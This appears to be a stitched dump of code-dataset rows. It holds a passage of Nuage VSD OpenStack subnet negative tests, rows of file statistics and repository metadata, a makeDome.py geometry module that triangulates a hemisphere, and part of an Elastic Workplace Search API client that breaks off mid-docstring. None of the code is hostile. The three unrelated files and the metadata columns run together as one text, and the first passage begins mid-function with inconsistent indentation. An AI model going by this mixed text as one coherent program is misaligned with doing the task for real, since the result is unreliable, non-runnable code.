    # And these are linked
    vsd_l2dom = self._given_vsdl2sharedmgd_lnkd_to_vsdl2domunmgd()
    self._create_vsd_mgd_subnet(
        vsd_l2dom,
        os_shared_network=self.os_shared_network,
        enable_dhcp=True,
        cidr=VALID_CIDR,  # bad
        gateway_ip=VALID_CIDR_GW,
        must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_l2_no_gw_unmgd_cidr_mismatch_neg(self):
    """Mismatching CIDR with --no-gateway must also fail."""
    # Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
    # And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
    # And these are linked
    vsd_l2dom = self._given_vsdl2sharedmgd_lnkd_to_vsdl2domunmgd()
    self._create_vsd_mgd_subnet(
        vsd_l2dom,
        os_shared_network=self.os_shared_network,
        enable_dhcp=True,
        cidr=VALID_CIDR,  # bad
        gateway_ip=None,
        must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_opt3_l2_unmgd_without_gw_no_dhcp_neg(self):
# Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
# And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
# with DHCP-option 3 set
# And these are linked
vsd_l2dom = self._given_vsdl2sharedmgdopt3_linked_to_vsdl2domunmgd(
VSD_L2_SHARED_MGD_OPT3)
self._create_vsd_mgd_subnet(
vsd_l2dom,
os_shared_network=self.os_shared_network,
enable_dhcp=False, # bad
cidr=VSD_L2_SHARED_MGD_OPT3_CIDR,
gateway_ip='',
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_opt_3_l2_unmgd_with_gw_no_dhcp_neg(self):
# Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
# And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
# with DHCP-option 3 set
# And these are linked
vsd_l2dom = self._given_vsdl2sharedmgdopt3_linked_to_vsdl2domunmgd(
VSD_L2_SHARED_MGD_OPT3)
self._create_vsd_mgd_subnet(
vsd_l2dom,
os_shared_network=self.os_shared_network,
enable_dhcp=False, # bad
cidr=VSD_L2_SHARED_MGD_OPT3_CIDR,
gateway_ip=VSD_L2_SHARED_MGD_OPT3_GW,
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_opt_3_l2_unmgd_no_gw_no_dhcp_neg(self):
# Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
# And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
# with DHCP-option 3 set
# And these are linked
vsd_l2dom = self._given_vsdl2sharedmgdopt3_linked_to_vsdl2domunmgd(
VSD_L2_SHARED_MGD_OPT3)
self._create_vsd_mgd_subnet(
vsd_l2dom,
os_shared_network=self.os_shared_network,
enable_dhcp=False, # bad
cidr=VSD_L2_SHARED_MGD_OPT3_CIDR,
gateway_ip=None,
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_opt_3_l2_unmgd_wo_gw_cidr_mismatch_neg(self):
# Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
# And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
# with DHCP-option 3 set
# And these are linked
vsd_l2dom = self._given_vsdl2sharedmgdopt3_linked_to_vsdl2domunmgd(
VSD_L2_SHARED_MGD_OPT3)
self._create_vsd_mgd_subnet(
vsd_l2dom,
os_shared_network=self.os_shared_network,
enable_dhcp=True,
cidr=VALID_CIDR, # bad
gateway_ip='',
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_opt_3_l2_unmgd_with_gw_cidr_mismatch_neg(self):
# Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
# And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
# with DHCP-option 3 set
# And these are linked
vsd_l2dom = self._given_vsdl2sharedmgdopt3_linked_to_vsdl2domunmgd(
VSD_L2_SHARED_MGD_OPT3)
self._create_vsd_mgd_subnet(
vsd_l2dom,
os_shared_network=self.os_shared_network,
enable_dhcp=True,
cidr=VALID_CIDR, # bad
gateway_ip=VALID_CIDR_GW,
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_opt_3_l2_unmgd_no_gw_cidr_mismatch_neg(self):
# Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
# And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
# with DHCP-option 3 set
# And these are linked
vsd_l2dom = self._given_vsdl2sharedmgdopt3_linked_to_vsdl2domunmgd(
VSD_L2_SHARED_MGD_OPT3)
self._create_vsd_mgd_subnet(
vsd_l2dom,
os_shared_network=self.os_shared_network,
enable_dhcp=True,
cidr=VALID_CIDR, # bad
gateway_ip=None,
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l3_shared_mgd_l3_unmgd_wo_gw_no_dhcp_neg(self):
# Given I have a VSD-L3-domain without IPAM (i.e. UnManaged)
# And I have a VSD-L3-Shared-domain with IPAM (i.e. Managed)
# with dhcp options 3
# and these are linked
vsd_l3_unmgd_subnet = \
self._given_vsdl3sharedmgd_lnkd_to_vsdl2subnetunmgd()
self._create_vsd_mgd_subnet(
vsd_l3_unmgd_subnet,
os_shared_network=self.os_shared_network,
enable_dhcp=False, # bad
cidr=base_vsd_managed_networks.VSD_L3_SHARED_MGD_CIDR,
gateway_ip=None,
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l3_shared_mgd_l3_unmgd_with_gw_no_dhcp_neg(self):
# Given I have a VSD-L3-domain without IPAM (i.e. UnManaged)
# And I have a VSD-L3-Shared-domain with IPAM (i.e. Managed)
# with dhcp options 3
# and these are linked
vsd_l3_unmgd_subnet = \
self._given_vsdl3sharedmgd_lnkd_to_vsdl2subnetunmgd()
self._create_vsd_mgd_subnet(
vsd_l3_unmgd_subnet,
os_shared_network=self.os_shared_network,
enable_dhcp=False, # bad
cidr=base_vsd_managed_networks.VSD_L3_SHARED_MGD_CIDR,
gateway_ip=base_vsd_managed_networks.VSD_L3_SHARED_MGD_GW,
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l3_shared_mgd_l3_unmgd_no_gw_no_dhcp_neg(self):
# Given I have a VSD-L3-domain without IPAM (i.e. UnManaged)
# And I have a VSD-L3-Shared-domain with IPAM (i.e. Managed)
# with dhcp options 3
# and these are linked
vsd_l3_unmgd_subnet = \
self._given_vsdl3sharedmgd_lnkd_to_vsdl2subnetunmgd()
self._create_vsd_mgd_subnet(
vsd_l3_unmgd_subnet,
os_shared_network=self.os_shared_network,
enable_dhcp=False, # bad
cidr=base_vsd_managed_networks.VSD_L3_SHARED_MGD_CIDR,
gateway_ip=None,
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l3_shared_mgd_l3_unmgd_wo_gw_cidr_mismatch_neg(self):
# Given I have a VSD-L3-domain without IPAM (i.e. UnManaged)
# And I have a VSD-L3-Shared-domain with IPAM (i.e. Managed)
# with dhcp options 3
# and these are linked
vsd_l3_unmgd_subnet = \
self._given_vsdl3sharedmgd_lnkd_to_vsdl2subnetunmgd()
self._create_vsd_mgd_subnet(
vsd_l3_unmgd_subnet,
os_shared_network=self.os_shared_network,
enable_dhcp=True,
cidr=VALID_CIDR, # bad
gateway_ip='',
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l3_shared_mgd_l3_unmgd_with_gw_cidr_mismatch_neg(self):
# Given I have a VSD-L3-domain without IPAM (i.e. UnManaged)
# And I have a VSD-L3-Shared-domain with IPAM (i.e. Managed)
# with dhcp options 3
# and these are linked
vsd_l3_unmgd_subnet = \
self._given_vsdl3sharedmgd_lnkd_to_vsdl2subnetunmgd()
self._create_vsd_mgd_subnet(
vsd_l3_unmgd_subnet,
os_shared_network=self.os_shared_network,
enable_dhcp=True,
cidr=VALID_CIDR, # bad
gateway_ip=VALID_CIDR_GW,
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l3_shared_mgd_l3_unmgd_no_gw_cidr_mismatch_neg(self):
# Given I have a VSD-L3-domain without IPAM (i.e. UnManaged)
# And I have a VSD-L3-Shared-domain with IPAM (i.e. Managed)
# with dhcp options 3
# and these are linked
vsd_l3_unmgd_subnet = \
self._given_vsdl3sharedmgd_lnkd_to_vsdl2subnetunmgd()
self._create_vsd_mgd_subnet(
vsd_l3_unmgd_subnet,
os_shared_network=self.os_shared_network,
enable_dhcp=True,
cidr=VALID_CIDR, # bad
gateway_ip=None,
must_fail=True)
@nuage_test.class_header(tags=[tags.ML2, tags.VSD_MANAGED])
class VSDPublicSharedResourcesML2Test(VSDPublicResourcesML2Test):
    # Re-runs the entire VSDPublicResourcesML2Test suite, but with the
    # OpenStack network created as a *shared* network (the parent's test
    # methods pass self.os_shared_network through to subnet creation).
    os_shared_network = True
| 42.075426
| 79
| 0.637715
| 4,825
| 34,586
| 4.236477
| 0.047461
| 0.030576
| 0.047894
| 0.029059
| 0.912969
| 0.906218
| 0.894721
| 0.88797
| 0.885084
| 0.878773
| 0
| 0.023451
| 0.288614
| 34,586
| 821
| 80
| 42.126675
| 0.807348
| 0.318308
| 0
| 0.792735
| 0
| 0
| 0.021487
| 0.001038
| 0
| 0
| 0
| 0
| 0.002137
| 1
| 0.07265
| false
| 0
| 0.017094
| 0
| 0.098291
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f21def0abd39bf598dafbf4f177dd456a3970e0c
| 5,591
|
py
|
Python
|
makeDome.py
|
bttaylor/TactileMaps
|
d09d70d8f12e6e2b90f8c7cb1ea0b5d72765ef45
|
[
"MIT"
] | null | null | null |
makeDome.py
|
bttaylor/TactileMaps
|
d09d70d8f12e6e2b90f8c7cb1ea0b5d72765ef45
|
[
"MIT"
] | null | null | null |
makeDome.py
|
bttaylor/TactileMaps
|
d09d70d8f12e6e2b90f8c7cb1ea0b5d72765ef45
|
[
"MIT"
] | null | null | null |
from shapely.geometry import box, Polygon, LineString, Point, MultiLineString, MultiPolygon
import math
import elevation2stl
# def makeDome(r,center,coarseness):
# (tri,outer) = makeCircle(r,center,coarseness);
# for i in range(0,len(tri)):
# p1 = [tri[i][0].x,tri[i][0].y,tri[i][0].z]
# p2 = [tri[i][1].x,tri[i][1].y,tri[i][1].z]
# p3 = [tri[i][2].x,tri[i][2].y,tri[i][2].z]
# elevation2stl.printTriangle(p1,p2,p3,fname)
def makeCircle(r, center, coarseness, z_adj=0):
    """Triangulate a hemispherical dome of radius ``r`` centred on ``center``.

    The dome is tessellated one quadrant at a time (rotations 0, pi/2, pi and
    3*pi/2 around the vertical axis), each quadrant built as ``coarseness``
    latitude rows of triangle fans.  The original implementation copy-pasted
    the quadrant loop four times; this version runs a single helper over the
    four rotations, producing float-identical geometry.

    :param r: dome radius.
    :param center: point with ``x``/``y`` attributes (assumed to be a
        shapely ``Point`` — the z coordinate of ``center`` is ignored).
    :param coarseness: number of latitude rows per quadrant; higher = finer.
    :param z_adj: vertical offset added to every generated z coordinate.
    :returns: ``(triangles, all_outer)`` where ``triangles`` is a list of
        3-point lists and ``all_outer`` is the dome's base rim, one quadrant
        after another with the per-quadrant duplicate endpoint dropped.
    """
    triangles = []
    all_outer = []
    phi = (math.pi / 2) / coarseness  # polar angle step between rows

    def _tessellate_quadrant(rotate):
        """Append one quarter-dome's triangles; return its rim ring.

        The last point of the returned ring is dropped by the caller's
        slice because it coincides with the first point of the next
        (rotated) quadrant.
        """
        # Apex of the dome; every quadrant starts from the same point.
        inner_pts = [Point(center.x, center.y, r + z_adj)]
        outer_pts = inner_pts
        for row in range(coarseness):
            outer_r = r * math.sin((row + 1) * phi)
            outer_z = r * math.cos((row + 1) * phi)
            # Row ``row`` has row+2 points spread over a 90-degree arc.
            theta = (math.pi / 2) / (row + 1)
            outer_pts = []
            for j in range(row + 2):
                x = center.x + outer_r * math.sin(j * theta + rotate)
                y = center.y + outer_r * math.cos(j * theta + rotate)
                outer_pts.append(Point(x, y, outer_z + z_adj))
            # First triangle of the fan at the start of the row...
            triangles.append([inner_pts[0], outer_pts[0], outer_pts[1]])
            # ...then two triangles per remaining inner point (a quad split).
            for j in range(1, len(inner_pts)):
                triangles.append(
                    [inner_pts[j - 1], outer_pts[j], inner_pts[j]])
                triangles.append(
                    [inner_pts[j], outer_pts[j], outer_pts[j + 1]])
            inner_pts = outer_pts
        # Rim of this quadrant, minus the duplicated trailing point.
        return outer_pts[0:len(outer_pts) - 1]

    for rotate in (0.0, math.pi / 2, math.pi, 3 * math.pi / 2):
        all_outer += _tessellate_quadrant(rotate)
    return (triangles, all_outer)
| 31.767045
| 91
| 0.630656
| 1,015
| 5,591
| 3.314286
| 0.0867
| 0.095125
| 0.03805
| 0.082045
| 0.850773
| 0.850773
| 0.84126
| 0.84126
| 0.84126
| 0.832937
| 0
| 0.034559
| 0.187444
| 5,591
| 175
| 92
| 31.948571
| 0.705921
| 0.244142
| 0
| 0.824176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010989
| false
| 0
| 0.032967
| 0
| 0.054945
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4818dc86f9fb3c156ecd708cae494e47fdfcdb0b
| 38,838
|
py
|
Python
|
project/workplace_search.py
|
gujralsanyam22/elastic_enterprise_search_app
|
0ceec37d249006c2ef5d6415e1f5507df642deed
|
[
"Apache-2.0"
] | null | null | null |
project/workplace_search.py
|
gujralsanyam22/elastic_enterprise_search_app
|
0ceec37d249006c2ef5d6415e1f5507df642deed
|
[
"Apache-2.0"
] | null | null | null |
project/workplace_search.py
|
gujralsanyam22/elastic_enterprise_search_app
|
0ceec37d249006c2ef5d6415e1f5507df642deed
|
[
"Apache-2.0"
] | null | null | null |
# Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from elastic_transport import QueryParams
from .._utils import ( # noqa: F401
DEFAULT,
SKIP_IN_PATH,
to_array,
to_deep_object,
to_path,
)
from ._base import BaseClient
class WorkplaceSearch(BaseClient):
def create_analytics_event(
self,
body,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Capture click and feedback analytic events
`<https://www.elastic.co/guide/en/workplace-search/current/workplace-search-analytics-api.html>`_
:arg body: HTTP request body
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.BadRequestError:
:raises elastic_enterprise_search.UnauthorizedError:
"""
params = QueryParams(params)
return self.perform_request(
"POST",
"/api/ws/v1/analytics/event",
body=body,
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def create_content_source(
self,
body,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Create a content source
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-content-sources-api.html#create-content-source-api>`_
:arg body: HTTP request body
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.BadRequestError:
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
"""
params = QueryParams(params)
return self.perform_request(
"POST",
"/api/ws/v1/sources",
body=body,
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def delete_content_source(
self,
content_source_id,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Deletes a content source by ID
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-content-sources-api.html#remove-content-source-api>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.BadRequestError:
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
"""
if content_source_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
return self.perform_request(
"DELETE",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
),
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def get_content_source(
self,
content_source_id,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Retrieves a content source by ID
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-content-sources-api.html#get-content-source-api>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
"""
if content_source_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
return self.perform_request(
"GET",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
),
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def put_content_source(
self,
content_source_id,
body,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Update a content source
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-content-sources-api.html#update-content-source-api>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg body: HTTP request body
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.BadRequestError:
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
"""
if content_source_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
return self.perform_request(
"PUT",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
),
body=body,
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def list_content_sources(
self,
current_page=None,
page_size=None,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Retrieves all content sources
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-content-sources-api.html#list-content-sources-api>`_
:arg current_page: Which page of results to request
:arg page_size: The number of results to return in a page
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
"""
params = QueryParams(params)
if current_page is not None:
params.add("page[current]", current_page)
if page_size is not None:
params.add("page[size]", page_size)
return self.perform_request(
"GET",
"/api/ws/v1/sources",
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def get_document(
self,
content_source_id,
document_id,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Retrieves a document by ID from the specified content source
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-content-sources-api.html#get-document-by-id-api>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg document_id: Unique ID for a content source document. Provided upon
or returned at creation.
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
"""
for param in (
content_source_id,
document_id,
):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
return self.perform_request(
"GET",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
"documents",
document_id,
),
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def delete_documents(
self,
content_source_id,
document_ids,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Deletes a list of documents from a custom content source
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-custom-sources-api.html#delete-by-id>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg document_ids: HTTP request body
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.BadRequestError:
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
:raises elastic_enterprise_search.PayloadTooLargeError:
"""
if content_source_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
return self.perform_request(
"POST",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
"documents",
"bulk_destroy",
),
body=document_ids,
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def delete_all_documents(
self,
content_source_id,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Deletes all documents in a custom content source
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-custom-sources-api.html#delete-all-documents>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
"""
if content_source_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
return self.perform_request(
"DELETE",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
"documents",
),
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def index_documents(
self,
content_source_id,
documents,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Indexes one or more new documents into a custom content source, or updates one
or more existing documents
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-custom-sources-api.html#index-and-update>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg documents: HTTP request body
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.BadRequestError:
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
:raises elastic_enterprise_search.PayloadTooLargeError:
"""
if content_source_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
return self.perform_request(
"POST",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
"documents",
"bulk_create",
),
body=documents,
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def list_external_identities(
self,
content_source_id,
current_page=None,
page_size=None,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Retrieves all external identities
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-external-identities-api.html#list-external-identities>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg current_page: Which page of results to request
:arg page_size: The number of results to return in a page
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
"""
if content_source_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
if current_page is not None:
params.add("page[current]", current_page)
if page_size is not None:
params.add("page[size]", page_size)
return self.perform_request(
"GET",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
"external_identities",
),
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def create_external_identity(
self,
content_source_id,
body,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Adds a new external identity
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-external-identities-api.html#add-external-identity>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg body: HTTP request body
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.BadRequestError:
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
"""
if content_source_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
return self.perform_request(
"POST",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
"external_identities",
),
body=body,
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def delete_external_identity(
self,
content_source_id,
user,
params=None,
headers=None,
http_auth=DEFAULT,
request_timeout=DEFAULT,
ignore_status=(),
):
"""
Deletes an external identity
`<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-external-identities-api.html#remove-external-identity>`_
:arg content_source_id: Unique ID for a Custom API source, provided upon
creation of a Custom API Source
:arg user: The username in context
:arg params: Additional query params to send with the request
:arg headers: Additional headers to send with the request
:arg http_auth: Access token or HTTP basic auth username
and password to send with the request
:arg request_timeout: Timeout in seconds
:arg ignore_status: HTTP status codes to not raise an error
:raises elastic_enterprise_search.UnauthorizedError:
:raises elastic_enterprise_search.NotFoundError:
"""
for param in (
content_source_id,
user,
):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument")
params = QueryParams(params)
return self.perform_request(
"DELETE",
to_path(
"api",
"ws",
"v1",
"sources",
content_source_id,
"external_identities",
user,
),
params=params,
headers=headers,
http_auth=http_auth,
request_timeout=request_timeout,
ignore_status=ignore_status,
)
def get_external_identity(
    self,
    content_source_id,
    user,
    params=None,
    headers=None,
    http_auth=DEFAULT,
    request_timeout=DEFAULT,
    ignore_status=(),
):
    """
    Retrieves an external identity

    `<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-external-identities-api.html#show-external-identity>`_

    :arg content_source_id: Unique ID for a Custom API source, provided upon
        creation of a Custom API Source
    :arg user: The username in context
    :arg params: Additional query params to send with the request
    :arg headers: Additional headers to send with the request
    :arg http_auth: Access token or HTTP basic auth username
        and password to send with the request
    :arg request_timeout: Timeout in seconds
    :arg ignore_status: HTTP status codes to not raise an error
    :raises elastic_enterprise_search.UnauthorizedError:
    :raises elastic_enterprise_search.NotFoundError:
    """
    # Both values become URL path segments, so neither may be empty.
    if content_source_id in SKIP_IN_PATH or user in SKIP_IN_PATH:
        raise ValueError("Empty value passed for a required argument")
    query = QueryParams(params)
    path = to_path(
        "api", "ws", "v1", "sources", content_source_id, "external_identities", user
    )
    return self.perform_request(
        "GET",
        path,
        params=query,
        headers=headers,
        http_auth=http_auth,
        request_timeout=request_timeout,
        ignore_status=ignore_status,
    )
def put_external_identity(
    self,
    content_source_id,
    user,
    body,
    params=None,
    headers=None,
    http_auth=DEFAULT,
    request_timeout=DEFAULT,
    ignore_status=(),
):
    """
    Updates an external identity

    `<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-external-identities-api.html#update-external-identity>`_

    :arg content_source_id: Unique ID for a Custom API source, provided upon
        creation of a Custom API Source
    :arg user: The username in context
    :arg body: HTTP request body
    :arg params: Additional query params to send with the request
    :arg headers: Additional headers to send with the request
